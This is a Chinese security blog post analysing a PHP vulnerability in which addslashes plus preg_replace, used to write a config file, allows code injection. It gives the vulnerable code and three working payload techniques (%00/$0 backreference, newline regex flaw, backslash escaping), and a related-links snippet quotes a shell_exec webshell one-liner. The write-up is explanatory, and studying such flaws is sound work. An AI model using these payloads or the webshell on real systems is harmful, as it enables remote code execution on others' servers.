@author: Dlive

P牛在小密圈中发的一个有关使用PHP正则配合写配置文件导致Getshell的经典漏洞

漏洞代码是这样的:

<?php

//ph.php

$str = addslashes($_GET['option']);

$file = file_get_contents('option.php');

$file = preg_replace('|\$option=\'.*\';|', "\$option='$str';", $file);

var_dump($file);

file_put_contents('option.php', $file);


<?php

//option.php

$option='123';

0x01 利用%00$0

这是我当时利用的一个方法(感觉我这个方法绕了好大一个弯儿QAQ)

payload:

http://192.168.204.238/test/ph.php?option=;phpinfo();

http://192.168.204.238/test/ph.php?option=%00

第二次传入的%00换为$0可达到相同效果

参考php手册对\0$0的描述:

http://php.net/manual/zh/function.preg-replace.php

\\0和$0代表完整的模式匹配文本

%00addslashes()转为\0,而\0preg_replace函数的第二个参数中代表“匹配到的全部内容”($0同理)

此时preg_replace要执行的代码如下

preg_replace('|\$option=\'.*\';|',"\$option='\\0';",$file);



preg_replace('|\$option=\'.*\';|',"\$option='$0';",$file);

即执行

preg_replace('|\$option=\'.*\';|',"\$option='$option=';phpinfo();';';",$file);

成功闭合单引号写入如下shell

<?php

$option='$option=';phpinfo();';';

0x02 利用换行符%0a和正则匹配缺陷

第一次传入 aaa';phpinfo();%0a//

此时文件内容

$option='aaa\';phpinfo();

//';

第二次传入随意字符串,如bbb, 正则代码.*会将匹配到的aaa\替换为bbb (正则匹配的缺陷)

此时文件内容(成功写入恶意代码)

$option='bbb';phpinfo();

//';

0x03 利用反斜杠转义单引号

payload:

http://192.168.204.238/test/ph.php?option=\';phpinfo();//

虽然addslashes将\转义为\\但是经过preg_replace处理后\\又变为了\

view-source:http://192.168.204.247/test/ph.php?option=\

string(19) "after addslashes:\\"

string(42) "second param of preg_replace:$option='\\';"

string(37) "after preg_replace:<?php

$option='\';"

最后的单引号被反斜杠转义

PHP正则经典漏洞的更多相关文章

  1. PHP配置文件经典漏洞

    phithon师父在小蜜圈里放了一个经典的配置文件写入问题漏洞. <?phpif(!isset($_GET['option'])) die();$str = addslashes($_GET[' ...

  2. 【经典漏洞案例】NSA黑客工具包——Windows 0day验证实验

    还记得今年4月中旬,Shadow Brokers(影子经纪人)黑客组织发布出一份震惊世界的机密文档,其中包含了多个Windows 远程漏洞利用工具,此工具集覆盖大量的Windows服务 器,可以被任何 ...

  3. 经典漏洞-后台备份数据库getshell

    由于接触安全时间不多,一些老的getshell方法不是很清楚.这次碰到了个老站,正好学习了一下. 首先这边是用户名可以猜测出来的,因为输入错误的用户名显示用户名不存在,如果存在的话会显示密码错误. 爆 ...

  4. 小白日记38:kali渗透测试之Web渗透-手动漏洞挖掘(四)-文件上传漏洞

    手动漏洞挖掘 文件上传漏洞[经典漏洞,本身为一个功能,根源:对上传文件的过滤机制不严谨] <?php echo shell_exec($_GET['cmd']);?> 直接上传webshe ...

  5. Java 正则表达式漏洞

    由于工作原因,一直没有时间把在线上遇到的问题总结一下.还好,今天我来了. 废话少说了. 主要说一下“java 正则表达式中的一个漏洞”,详细问题描述 http://bugs.sun.com/bugda ...

  6. 书评第003篇:《0day安全:软件漏洞分析技术(第2版)》

    本书基本信息 丛书名:安全技术大系 作者:王清(主编),张东辉.周浩.王继刚.赵双(编著) 出版社:电子工业出版社 出版时间:2011-6-1 ISBN:9787121133961 版次:1 页数:7 ...

  7. 手工挖掘web常见漏洞时的一些经验总结

    一.前提: 漏洞挖掘原则 所有变量 所有头 cookie中的变量 逐个变量删除 漏洞的本质 数据与指令的混淆 对用户输入信息过滤不严判断失误,误将数据当指令 二.经典漏洞: 1.身份认证 常用弱口令/ ...

  8. SSRF漏洞详解

    0.SSRF简介 SSRF全称为Server-side Request Forgery,即服务端请求伪造攻击,是一种由攻击者构造形成由服务器端发起请求的一个漏洞,一般情况下,SSRF 攻击的目标是从外 ...

  9. google hack使用集锦

    转载:https://blog.csdn.net/weixin_42127015/article/details/84472777 关于google hack的几个基础过滤器使用[请务必谨记,过滤器虽 ...

随机推荐

  1. SQL SERVER 的操作复习

    一.数据库的创建(SQL语句)CREATE DATABASE AON PRIMARY --主文件组(    NAME='A_data',--逻辑文件名    --物理文件名    FILENAME=' ...

  2. Python 中的容器 collections

    写在之前 我们都知道 Python 中内置了许多标准的数据结构,比如列表,元组,字典等.与此同时标准库还提供了一些额外的数据结构,我们可以基于它们创建所需的新数据结构. Python 附带了一个「容器 ...

  3. C计算了一下

    #include <stdio.h> int main(){ int a,b,c,e; a=6 + 5 / 4 - 2; b=2 + 2 * (2 * 2 - 2) % 2 / 3; c= ...

  4. python基础训练营01

    一.基础讲解: 1.1 文件末尾的.py后缀,指出这个文件,是一个python文件,因此,系统将使用python解释器来运行该文件,确定文件中每一个单词的含义. 1.2 python编辑/运行方法: ...

  5. MyBatis实例教程--开发环境搭建

    MyBatis实例教程--开发环境搭建 准备工作: 1.mybatis 的开发环境搭建,选择: eclipse j2ee 版本,mysql 5.1 ,jdk 1.7,mybatis3.2.0.jar包 ...

  6. k8s第一个实例创建redis集群服务

    1.创建redis-master-controller.yaml apiVersion: v1 kind: ReplicationController metadata: name: redis-ma ...

  7. w命令集合

    startx:在命令行模式下输入会进入图形界面 exit:注销Linux(以login shell登录会注销账号,以non-login shell登录会退出终端) data:显示日期和时间 data ...

  8. 【转】V8 之旅: 垃圾回收器

    垃圾回收器是一把十足的双刃剑.其好处是可以大幅简化程序的内存管理代码,因为内存管理无需程序员来操作,由此也减少了(但没有根除)长时间运转的程序的内存泄漏.对于某些程序员来说,它甚至能够提升代码的性能. ...

  9. mysql 查询表的字段数目

    select column_name from information_schema.`COLUMNS` where TABLE_NAME ='tcm_head'

  10. laravel 学习随笔(一)

    1.路由参数:路由参数总是通过花括号进行包裹,参数在路由被执行时会被传递到路由的闭包.(路由参数不能包含“-”字符,如有需要可以用“_”代替):